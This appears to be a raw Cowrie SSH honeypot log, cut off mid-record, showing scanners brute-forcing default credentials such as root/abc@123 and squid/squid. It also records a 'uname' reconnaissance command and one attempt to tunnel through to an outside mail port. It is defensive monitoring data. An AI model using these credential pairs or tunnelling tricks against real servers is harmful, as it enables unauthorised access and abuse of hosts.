{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:40:22.306998Z","src_ip":"199.195.253.95","session":"6e94eeebefca"}
{"eventid":"cowrie.login.failed","username":"prometheus","password":"prometheus123","message":"login attempt [prometheus/prometheus123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:40:22.659887Z","src_ip":"199.195.253.95","session":"6e94eeebefca"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:40:23.754192Z","src_ip":"199.195.253.95","session":"6e94eeebefca"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":33698,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7e3d6fc1513","protocol":"ssh","message":"New connection: 171.243.150.185:33698 (1.2.3.4:22) [session: e7e3d6fc1513]","sensor":"my-vps","timestamp":"2025-08-28T17:40:36.032540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:40:36.034256Z","src_ip":"171.243.150.185","session":"e7e3d6fc1513"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:40:36.233932Z","src_ip":"171.243.150.185","session":"e7e3d6fc1513"}
{"eventid":"cowrie.login.failed","username":"squid","password":"squid","message":"login attempt [squid/squid] failed","sensor":"my-vps","timestamp":"2025-08-28T17:40:38.116127Z","src_ip":"171.243.150.185","session":"e7e3d6fc1513"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:40:39.549711Z","src_ip":"171.243.150.185","session":"e7e3d6fc1513"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":57378,"dst_ip":"1.2.3.4","dst_port":22,"session":"472222ab0a31","protocol":"ssh","message":"New connection: 171.243.150.185:57378 (1.2.3.4:22) [session: 472222ab0a31]","sensor":"my-vps","timestamp":"2025-08-28T17:40:55.515656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:40:55.521481Z","src_ip":"171.243.150.185","session":"472222ab0a31"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:40:57.018857Z","src_ip":"171.243.150.185","session":"472222ab0a31"}
{"eventid":"cowrie.login.failed","username":"config","password":"config","message":"login attempt [config/config] failed","sensor":"my-vps","timestamp":"2025-08-28T17:40:58.070150Z","src_ip":"171.243.150.185","session":"472222ab0a31"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:40:59.273836Z","src_ip":"171.243.150.185","session":"472222ab0a31"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53654,"dst_ip":"1.2.3.4","dst_port":22,"session":"246d0655d400","protocol":"ssh","message":"New connection: 217.72.205.35:53654 (1.2.3.4:22) [session: 246d0655d400]","sensor":"my-vps","timestamp":"2025-08-28T17:41:01.359287Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:41:01.360826Z","src_ip":"217.72.205.35","session":"246d0655d400"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51892,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e02115c2a5b","protocol":"ssh","message":"New connection: 212.227.235.229:51892 (1.2.3.4:22) [session: 3e02115c2a5b]","sensor":"my-vps","timestamp":"2025-08-28T17:41:07.029091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:41:07.029955Z","src_ip":"212.227.235.229","session":"3e02115c2a5b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:41:07.134894Z","src_ip":"212.227.235.229","session":"3e02115c2a5b"}
{"eventid":"cowrie.login.success","username":"root","password":"abc@123","message":"login attempt [root/abc@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:41:07.450899Z","src_ip":"212.227.235.229","session":"3e02115c2a5b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:41:07.680303Z","src_ip":"212.227.235.229","session":"3e02115c2a5b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:41:07.681117Z","src_ip":"212.227.235.229","session":"3e02115c2a5b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:41:07.787226Z","src_ip":"212.227.235.229","session":"3e02115c2a5b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:41:07.788697Z","src_ip":"212.227.235.229","session":"3e02115c2a5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":18228,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6bd51991813","protocol":"ssh","message":"New connection: 212.227.235.229:18228 (1.2.3.4:22) [session: d6bd51991813]","sensor":"my-vps","timestamp":"2025-08-28T17:41:26.263604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:41:26.266605Z","src_ip":"212.227.235.229","session":"d6bd51991813"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:41:26.394970Z","src_ip":"212.227.235.229","session":"d6bd51991813"}
{"eventid":"cowrie.login.success","username":"root","password":"BHRT**56$wx*%*St","message":"login attempt [root/BHRT**56$wx*%*St] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:41:26.960128Z","src_ip":"212.227.235.229","session":"d6bd51991813"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T17:41:27.105209Z","session":"d6bd51991813"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T17:41:27.234150Z","src_ip":"212.227.235.229","session":"d6bd51991813"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:41:27.365142Z","src_ip":"212.227.235.229","session":"d6bd51991813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37980,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f27fea03c06","protocol":"ssh","message":"New connection: 212.227.125.160:37980 (1.2.3.4:22) [session: 1f27fea03c06]","sensor":"my-vps","timestamp":"2025-08-28T17:41:56.151426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:41:56.778183Z","src_ip":"212.227.125.160","session":"1f27fea03c06"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:41:56.832353Z","src_ip":"212.227.125.160","session":"1f27fea03c06"}
{"eventid":"cowrie.login.failed","username":"config","password":"config","message":"login attempt [config/config] failed","sensor":"my-vps","timestamp":"2025-08-28T17:41:59.472602Z","src_ip":"212.227.125.160","session":"1f27fea03c06"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:01.513434Z","src_ip":"212.227.125.160","session":"1f27fea03c06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39294,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a2c1084d6da","protocol":"ssh","message":"New connection: 212.227.235.229:39294 (1.2.3.4:22) [session: 5a2c1084d6da]","sensor":"my-vps","timestamp":"2025-08-28T17:42:33.899624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:33.901401Z","src_ip":"212.227.235.229","session":"5a2c1084d6da"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:42:34.007405Z","src_ip":"212.227.235.229","session":"5a2c1084d6da"}
{"eventid":"cowrie.login.failed","username":"solana","password":"sol","message":"login attempt [solana/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T17:42:34.327986Z","src_ip":"212.227.235.229","session":"5a2c1084d6da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55626,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c31ac8f5a51","protocol":"ssh","message":"New connection: 212.227.125.160:55626 (1.2.3.4:22) [session: 8c31ac8f5a51]","sensor":"my-vps","timestamp":"2025-08-28T17:42:34.335665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:42:34.376676Z","src_ip":"212.227.125.160","session":"8c31ac8f5a51"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v